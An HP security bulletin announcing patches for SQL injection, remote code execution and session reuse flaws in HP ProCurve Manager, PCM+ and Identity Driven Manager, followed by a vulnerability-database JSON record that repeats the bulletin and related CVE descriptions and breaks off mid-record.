-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03897409
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03897409
Version: 2
HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven
Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-10-15
Last Updated: 2013-10-15
Potential Security Impact: SQL injection, remote code execution, session
reuse
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP ProCurve
Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These
vulnerabilities could be exploited remotely to allow SQL injection, remote
code execution and session reuse.
References: CVE-2005-2572 (SSRT101272)
CVE-2013-4809 (ZDI-CAN-1744, SSRT101132)
CVE-2013-4810 (ZDI-CAN-1760, SSRT101127)
CVE-2013-4811 (ZDI-CAN-1743, SSRT101116)
CVE-2013-4812 (ZDI-CAN-1742, SSRT101115)
CVE-2013-4813 (ZDI-CAN-1745, SSRT101129)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ProCurve Manager (PCM) v3.x, v3.20, v4.0
HP PCM+ v3.20, v4.0
HP Identity Driven Manager (IDM) v4.0
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10
CVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with
HP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,
CVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com
RESOLUTION
HP has provided updated software to resolve these issues. Please used the
AutoUpdate feature of PCM.
Note about CVE-2005-2572 and PCM v3.X: To address CVE-2005-2572 on PCMv3, a
separate security tool must be run. This security tool can be found as
follows. Browse to the HP Networking Support Lookup Tool
http://www.hp.com/networking/support :
Enter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A
into the "Auto Search" text box
Check the appropriate product
Press "Display Selected"
Click "Software Downloads"
In the "Other" section, there will be a "Security Tools" download which
contains a zip file with several executables.
To protect your PCM v3.x installation, use the pcm320-DB-restrict tool. There
are 32bit and 64bit versions available. Please read the release notes
included in the Security Tool download.
IMPORTANT: If you will be updating a protected PCM v3 installation to PCM v4,
you will need to run the pcm320-DB-unrestrict utility prior to updating.
Product and Potential Vulnerability
Resolution
HP Branded Products Impacted
HP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)
HP PCM v4.00 AutoUpdate #6 04.00.06.628
J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user
License
J9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user
License
HP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)
HP PCM v4.00 AutoUpdate #5 04.00.05.612
HP PCM v3.20 AutoUpdate #8 C.03.20.1741
J9755A HP PCM+ v4 Software Platform with 50-device License
J9757A HP PCM+ v4 Software Platform with Unlimited-device License
J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade
J9174A HP ProCurve Manager Plus 3.0 software with 50 device license
J9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade
J9177A HP ProCurve Manager Plus 3.0 software with unlimited device license
HP PCM v4.00 ( CVE-2005-2572)
HP PCM v4.00 AutoUpdate #5 04.00.05.612
J9755A HP PCM+ v4 Software Platform with 50-device License
J9757A HP PCM+ v4 Software Platform with Unlimited-device License
HP PCM v3.x ( CVE-2005-2572)
HP PCM v3.x see Resolution text above.
J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade
J9174A HP ProCurve Manager Plus 3.0 software with 50 device license
J9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade
J9177A HP ProCurve Manager Plus 3.0 software with unlimited device license
HISTORY
Version:1 (rev.1) - 9 September 2013 Initial release
Version:2 (rev.2) - 15 October 2013 Added PCM v3
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci
UR8AoIhyX+Ht4By5+4v503IdvTZKcaWg
=3nFW
-----END PGP SIGNATURE-----
{"id": "SECURITYVULNS:DOC:30182", "bulletinFamily": "software", "title": "[security bulletin] HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 2\r\n\r\nHPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-10-15\r\nLast Updated: 2013-10-15\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.x, v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM.\r\n\r\nNote about CVE-2005-2572 and PCM v3.X: To address CVE-2005-2572 on PCMv3, a\r\nseparate security tool must be run. This security tool can be found as\r\nfollows. Browse to the HP Networking Support Lookup Tool\r\nhttp://www.hp.com/networking/support :\r\n\r\nEnter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A\r\ninto the "Auto Search" text box\r\nCheck the appropriate product\r\nPress "Display Selected"\r\nClick "Software Downloads"\r\nIn the "Other" section, there will be a "Security Tools" download which\r\ncontains a zip file with several executables.\r\nTo protect your PCM v3.x installation, use the pcm320-DB-restrict tool. There\r\nare 32bit and 64bit versions available. Please read the release notes\r\nincluded in the Security Tool download.\r\nIMPORTANT: If you will be updating a protected PCM v3 installation to PCM v4,\r\nyou will need to run the pcm320-DB-unrestrict utility prior to updating.\r\n\r\nProduct and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHP PCM v3.x ( CVE-2005-2572)\r\n HP PCM v3.x see Resolution text above.\r\n J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\nVersion:2 (rev.2) - 15 October 2013 Added PCM v3\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci\r\nUR8AoIhyX+Ht4By5+4v503IdvTZKcaWg\r\n=3nFW\r\n-----END PGP SIGNATURE-----\r\n", "published": "2014-01-08T00:00:00", "modified": "2014-01-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30182", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:50", "edition": 1, "viewCount": 80, "enchantments": {"score": {"value": 8.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-2960", "CPAI-2013-2968", "CPAI-2013-3503"]}, {"type": "cve", "idList": ["CVE-2005-2572", "CVE-2013-4809", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4812", "CVE-2013-4813"]}, {"type": "d2", "idList": ["D2SEC_HPPCM", "D2SEC_HPPCM2"]}, {"type": "dsquare", "idList": ["E-344", "E-349"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_CERTIFICATES", "MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_DOMAIN"]}, {"type": "nessus", "idList": ["8218.PRM", "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "MYSQL_USER_DEFINED_FUNCTIONS_RESTRICTIONS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103811"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123255", "PACKETSTORM:123256"]}, {"type": "saint", "idList": ["SAINT:279F95372544AFCA3000201D14830112", "SAINT:66194A0423C6048B45F3300165835412", "SAINT:73B78E4CC6A84900DDFE755805A5092F", "SAINT:7F3C5163C30890F5F0C5C51957FFFEEF", "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "SAINT:D7E7AE713FCC306B414BDDDCF928FB38", "SAINT:F331FA17751309C5BD461AF4E8A90312"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29808", "SECURITYVULNS:VULN:13282", "SECURITYVULNS:VULN:13501"]}, {"type": "thn", "idList": ["THN:8573602ED2B18F90AC04D8BA8D25E682"]}, {"type": "threatpost", "idList": ["THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2005-2572"]}, {"type": "zdi", "idList": ["ZDI-13-225", "ZDI-13-226", "ZDI-13-227", "ZDI-13-228", "ZDI-13-229"]}, {"type": "zdt", "idList": ["1337DAY-ID-21240", "1337DAY-ID-21241"]}]}, "backreferences": {"references": [{"type": "canvas", "idList": ["MU"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-2960", "CPAI-2013-2968", "CPAI-2013-3503"]}, {"type": "cve", "idList": ["CVE-2005-2572"]}, {"type": "d2", "idList": ["D2SEC_HPPCM"]}, {"type": "dsquare", "idList": ["E-349"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_CERTIFICATES", "MSF:EXPLOIT/WINDOWS/HTTP/HP_PCM_SNAC_UPDATE_DOMAIN"]}, {"type": "nessus", "idList": ["MYSQL_USER_DEFINED_FUNCTIONS_RESTRICTIONS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103811"]}, {"type": "saint", "idList": ["SAINT:88A58EBA93902ACCCFD4D15339D739F8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13282"]}, {"type": "threatpost", "idList": ["THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2005-2572"]}, {"type": "zdi", "idList": ["ZDI-13-227", "ZDI-13-228", "ZDI-13-229"]}, {"type": "zdt", "idList": ["1337DAY-ID-21240"]}]}, "exploitation": null, "vulnersScore": 8.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:49", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 1\r\n\r\nHPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-09-09\r\nLast Updated: 2013-09-09\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please used the\r\nAutoUpdate feature of PCM. Product and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlIuBgcACgkQ4B86/C0qfVlvcwCggBleIQ2jJ5kVsOs0jnnfN0nJ\r\njqkAnjs4Po+SPJx4rm+WXolFai2juOmy\r\n=5yU4\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "[security bulletin] HPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:DOC:29808", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29808", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:16", "description": "Crossite scripting, code execution.", "edition": 2, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "HP ProCurve Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13501", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13501", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:44", "description": "Code execution, session reusage, SQL injection.", "edition": 2, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "HP ProCurve Manager, HP Identity Driven Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:VULN:13282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13282", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T22:04:08", "description": "MySQL, when running on Windows, allows remote authenticated users with\ninsert privileges on the mysql.func table to cause a denial of service\n(server hang) and possibly execute arbitrary code via (1) a request for a\nnon-library file, which causes the Windows LoadLibraryEx function to block,\nor (2) a request for a function in a library that has the XXX_deinit or\nXXX_init functions defined but is not tailored for mySQL, such as\njpeg1x32.dll and jpeg2x32.dll.", "cvss3": {}, "published": "2005-08-16T00:00:00", "type": "ubuntucve", "title": "CVE-2005-2572", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2572"], "modified": "2005-08-16T00:00:00", "id": "UB:CVE-2005-2572", "href": "https://ubuntu.com/security/CVE-2005-2572", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:18:00", "description": "MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll.", "cvss3": {}, "published": "2005-08-16T04:00:00", "type": "cve", "title": "CVE-2005-2572", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2572"], "modified": "2019-12-17T17:14:00", "cpe": 